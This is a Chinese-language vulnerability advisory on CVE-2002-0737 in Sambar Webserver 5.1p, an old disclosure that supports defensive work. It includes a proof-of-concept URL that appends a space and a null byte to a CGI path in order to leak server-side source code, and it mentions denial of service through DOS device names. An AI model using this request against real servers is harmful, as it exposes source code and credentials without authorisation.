Sambar WEB服务程序服务端文件解析可绕过漏洞
发布日期:2002-04-17
更新日期:2002-04-19
受影响系统:Sambar Webserver V5.1p
- Microsoft Windows 2000
描述:
BUGTRAQ ID:
4533
CVE(CAN) ID:
CVE-2002-0737
Sambar Webserver是一款多线程的 HTTP 服务器,可使用于Windows、Unix、Linux操作系统下。
Sambar Webserver在服务端URL解析处理中存在漏洞,远程攻击者可以获得请求文件源代码信息。
攻击者可以向Sambar Webserver提交任何文件请求并在文件名后追加空格和NULL字符,可以导致Sambar Webserver返回包含请求文件源代码信息,可能导致密码等敏感的信息泄露。
攻击者同样可以请求DOS设备名进行拒绝服务攻击。
<*来源:Peter Gründl (
pgrundl@kpmg.dk)
链接:
http://archives.neohapsis.com/archives/bugtraq/2002-04/0222.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Peter Gründl (
pgrundl@kpmg.dk)提供了如下测试方法:
请求如下URL:
http://server/cgi-bin/environ.pl+%00
可导致泄露如下信息:
read(STDIN, $CONTENT, $ENV{'CONTENT_LENGTH'});
print< GATEWAY_INTERFACE: $ENV{'GATEWAY_INTERFACE'}
PATH_INFO: $ENV{'PATH_INFO'}
PATH_TRANSLATED: $ENV{'PATH_TRANSLATED'}
QUERY_STRING: $ENV{'QUERY_STRING'}
REMOTE_ADDR: $ENV{'REMOTE_ADDR'}
REMOTE_HOST: $ENV{'REMOTE_HOST'}
REMOTE_USER: $ENV{'REMOTE_USER'}
REQUEST_METHOD: $ENV{'REQUEST_METHOD'}
DOCUMENT_NAME: $ENV{'DOCUMENT_NAME'}
DOCUMENT_URI: $ENV{'DOCUMENT_URI'}
SCRIPT_NAME: $ENV{'SCRIPT_NAME'}
SCRIPT_FILENAME: $ENV{'SCRIPT_FILENAME'}
SERVER_NAME: $ENV{'SERVER_NAME'}
SERVER_PORT: $ENV{'SERVER_PORT'}
SERVER_PROTOCOL: $ENV{'SERVER_PROTOCOL'}
SERVER_SOFTWARE: $ENV{'SERVER_SOFTWARE'}
CONTENT_LENGTH: $ENV{'CONTENT_LENGTH'}
CONTENT: $CONTENT
END
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 暂时没有合适的临时解决方法。
厂商补丁:
Sambar
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
下载最新程序5.2B版本:
http://sambar.dnsaloas.org/win32-preview.tar.gz浏览次数:3194
严重程度:0(网友投票)